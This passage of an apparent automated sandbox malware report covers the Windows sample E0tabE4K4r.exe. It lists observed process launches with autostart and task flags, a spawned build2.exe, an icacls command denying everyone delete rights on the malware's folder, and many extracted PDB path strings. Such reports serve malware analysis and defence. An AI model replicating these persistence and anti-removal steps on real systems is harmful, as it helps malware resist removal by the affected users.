          Source: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exeProcess created: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe "C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe" --AutoStart
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeProcess created: C:\Users\user\Desktop\E0tabE4K4r.exe C:\Users\user\Desktop\E0tabE4K4r.exeJump to behavior
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8" /deny *S-1-1-0:(OI)(CI)(DE,DC)Jump to behavior
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeProcess created: C:\Users\user\Desktop\E0tabE4K4r.exe "C:\Users\user\Desktop\E0tabE4K4r.exe" --Admin IsNotAutoStart IsNotTaskJump to behavior
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeProcess created: C:\Users\user\Desktop\E0tabE4K4r.exe "C:\Users\user\Desktop\E0tabE4K4r.exe" --Admin IsNotAutoStart IsNotTaskJump to behavior
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeProcess created: C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exe "C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exe" Jump to behavior
          Source: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exeProcess created: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe --TaskJump to behavior
          Source: C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exeProcess created: C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exe "C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exe"
          Source: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exeProcess created: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe "C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe" --AutoStart
          Source: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exeProcess created: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe "C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe" --AutoStart
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\w\ source: E0tabE4K4r.exe, 00000006.00000003.1924983345.00000000036F9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: E0tabE4K4r.exe, 00000006.00000003.1764092521.0000000003115000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ c source: E0tabE4K4r.exe, 00000006.00000003.1872102730.0000000003648000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1872748425.0000000003648000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\* source: E0tabE4K4r.exe, 00000006.00000003.1838388876.0000000003709000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: sers\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.cdqw source: E0tabE4K4r.exe, 00000006.00000003.1763606123.000000000312C000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763564795.0000000003129000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: E0tabE4K4r.exe, 00000006.00000003.1820263634.0000000003709000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: E0tabE4K4r.exe, 00000006.00000003.1887923185.0000000003A0D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ov source: E0tabE4K4r.exe, 00000006.00000003.1887923185.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1893248676.0000000003A45000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\C\mk?v' source: E0tabE4K4r.exe, 00000006.00000003.1900876731.0000000003960000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Ij1fw source: E0tabE4K4r.exe, 00000006.00000003.1887923185.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1893248676.0000000003A45000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\re\ source: E0tabE4K4r.exe, 00000006.00000003.1818963337.0000000003613000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\T source: E0tabE4K4r.exe, 00000006.00000003.1887923185.0000000003A0D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\a source: E0tabE4K4r.exe, 00000006.00000003.1853394387.00000000035E0000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1852569222.00000000035D8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\es\. source: E0tabE4K4r.exe, 00000006.00000003.1924950025.00000000039BD000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\.logP; source: E0tabE4K4r.exe, 00000006.00000003.1763426037.000000000317E000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763857201.0000000003188000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1615800214.0000000003194000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: E0tabE4K4r.exe, 00000006.00000003.1765480086.0000000003139000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763606123.000000000312C000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763564795.0000000003129000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763646990.0000000003138000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\2t|/ source: E0tabE4K4r.exe, 00000006.00000003.1853583168.0000000003115000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1840465889.0000000003128000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1872586744.0000000003110000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\0Ud} source: E0tabE4K4r.exe, 00000006.00000003.1852569222.0000000003648000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1818963337.0000000003648000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1839010273.0000000003648000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1852859867.000000000368D000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1819328681.0000000003664000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1854650583.0000000003694000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\ source: E0tabE4K4r.exe, 00000006.00000003.1852901443.000000000378E000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1852217055.000000000370D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: E0tabE4K4r.exe, E0tabE4K4r.exe, 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000007.00000002.1281381535.0000000002280000.00000040.00001000.00020000.00000000.sdmp, E0tabE4K4r.exe, 0000000D.00000002.2485636228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000010.00000002.1396247343.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000011.00000002.1406738224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000013.00000002.1480789200.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000014.00000002.1490001313.0000000000400000.00000040.00000400.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: E0tabE4K4r.exe, 00000006.00000003.1901213675.0000000003603000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1894086061.0000000003603000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\= source: E0tabE4K4r.exe, 00000006.00000003.1854428901.0000000003958000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1853741689.0000000003951000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Burn\d.pdb\ source: E0tabE4K4r.exe, 00000006.00000003.1930135504.0000000003994000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1930586659.0000000003994000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\C2\\ source: E0tabE4K4r.exe, 00000006.00000003.1893459042.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1899749395.00000000039EC000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1893613345.00000000039DE000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\tion source: E0tabE4K4r.exe, 00000006.00000003.1871477613.000000000374A000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1872238803.00000000037AE000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.cdqw source: E0tabE4K4r.exe, 00000006.00000003.1763959319.0000000003648000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: E0tabE4K4r.exe, 00000006.00000003.1853284820.0000000003192000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1871594993.0000000003197000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1852996109.0000000003136000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1853232093.000000000313E000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1853319194.000000000319F000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1853859543.00000000031A1000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\47\> source: E0tabE4K4r.exe, 00000006.00000003.1616546391.0000000003115000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\ source: E0tabE4K4r.exe, 00000006.00000003.1888978285.0000000003624000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1889582927.0000000003624000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\C source: E0tabE4K4r.exe, 00000006.00000003.1854872315.0000000003651000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1852569222.0000000003648000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1854004621.0000000003648000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1839010273.0000000003648000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1853107330.0000000003648000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: E0tabE4K4r.exe, 00000006.00000003.1924950025.00000000039BD000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\e\ source: E0tabE4K4r.exe, 00000006.00000003.1888230622.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1889328606.00000000039E4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ta\M)%|A source: E0tabE4K4r.exe, 00000006.00000003.1888978285.0000000003624000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1889582927.0000000003624000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: E0tabE4K4r.exe, 00000006.00000003.1536537481.00000000035A0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\V source: E0tabE4K4r.exe, 00000006.00000003.1887923185.0000000003A0D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\es\\v source: E0tabE4K4r.exe, 00000006.00000003.1888096848.0000000003985000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\* source: E0tabE4K4r.exe, 00000006.00000003.1840067885.000000000374A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: E0tabE4K4r.exe, 00000000.00000002.1229908014.0000000002270000.00000040.00001000.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000005.00000002.1259313771.0000000002230000.00000040.00001000.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000007.00000002.1281381535.0000000002280000.00000040.00001000.00020000.00000000.sdmp, E0tabE4K4r.exe, 0000000D.00000002.2485636228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000010.00000002.1396247343.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000011.00000002.1406738224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000013.00000002.1480789200.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000014.00000002.1490001313.0000000000400000.00000040.00000400.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\os=~ source: E0tabE4K4r.exe, 00000006.00000003.1888096848.0000000003985000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbAppCache133494501122004824.txtng source: E0tabE4K4r.exe, 00000006.00000003.1763817024.0000000003147000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763893002.000000000314B000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1765255772.000000000314C000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763606123.000000000312C000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763564795.0000000003129000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763646990.0000000003138000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: E0tabE4K4r.exe, 00000006.00000003.1763426037.000000000317E000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763857201.0000000003188000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1615800214.0000000003194000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\* source: E0tabE4K4r.exe, 00000006.00000003.1819763925.00000000035E0000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763103396.00000000035DC000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1819912716.00000000035EB000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763722153.00000000035E7000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1765648554.00000000035EB000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1820389653.00000000035EC000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\ source: E0tabE4K4r.exe, 00000006.00000003.1871833943.00000000036E3000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ewy\ source: E0tabE4K4r.exe, 00000006.00000003.1930785375.0000000003188000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000002.1933888911.0000000003189000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\47\H source: E0tabE4K4r.exe, 00000006.00000003.1765480086.0000000003139000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1588022675.0000000003136000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763606123.000000000312C000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1616546391.0000000003115000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763564795.0000000003129000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1587983645.000000000312C000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763646990.0000000003138000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: E0tabE4K4r.exe, 00000006.00000003.1924983345.00000000036F9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: E0tabE4K4r.exe, 00000006.00000003.1900272839.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1930481237.0000000003AF1000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1923741980.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\G3 source: E0tabE4K4r.exe, 00000006.00000003.1930135504.0000000003994000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1930586659.0000000003994000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\\* source: E0tabE4K4r.exe, 00000006.00000003.1839357161.00000000035DC000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1819763925.00000000035E0000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1839396918.00000000035F3000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1819815577.00000000035F3000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: E0tabE4K4r.exe, 00000006.00000003.1852569222.0000000003648000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1818963337.0000000003648000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1839010273.0000000003648000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1852859867.000000000368D000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1819328681.0000000003664000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1854650583.0000000003694000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1818963337.0000000003613000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: E0tabE4K4r.exe, 00000006.00000003.1820263634.0000000003709000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\AC\ source: E0tabE4K4r.exe, 00000006.00000003.1893459042.0000000003921000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1889475372.0000000003931000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb\IDX_CONTENT_TASKBARHEADLINES.jsontxt\ source: E0tabE4K4r.exe, 00000006.00000003.1763817024.0000000003147000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763893002.000000000314B000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1765255772.000000000314C000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763606123.000000000312C000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763564795.0000000003129000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763646990.0000000003138000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\6] source: E0tabE4K4r.exe, 00000006.00000003.1820689174.0000000003174000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1819425961.0000000003169000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1820655737.000000000316F000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1818903237.0000000003136000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\e\p source: E0tabE4K4r.exe, 00000006.00000003.1871833943.00000000036E3000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\H source: E0tabE4K4r.exe, 00000006.00000003.1889475372.0000000003931000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ata\P source: E0tabE4K4r.exe, 00000006.00000003.1765255772.0000000003148000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763817024.0000000003147000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763606123.000000000312C000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763564795.0000000003129000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763646990.0000000003138000.00000004.00000020.00020000.00000000.sdmp
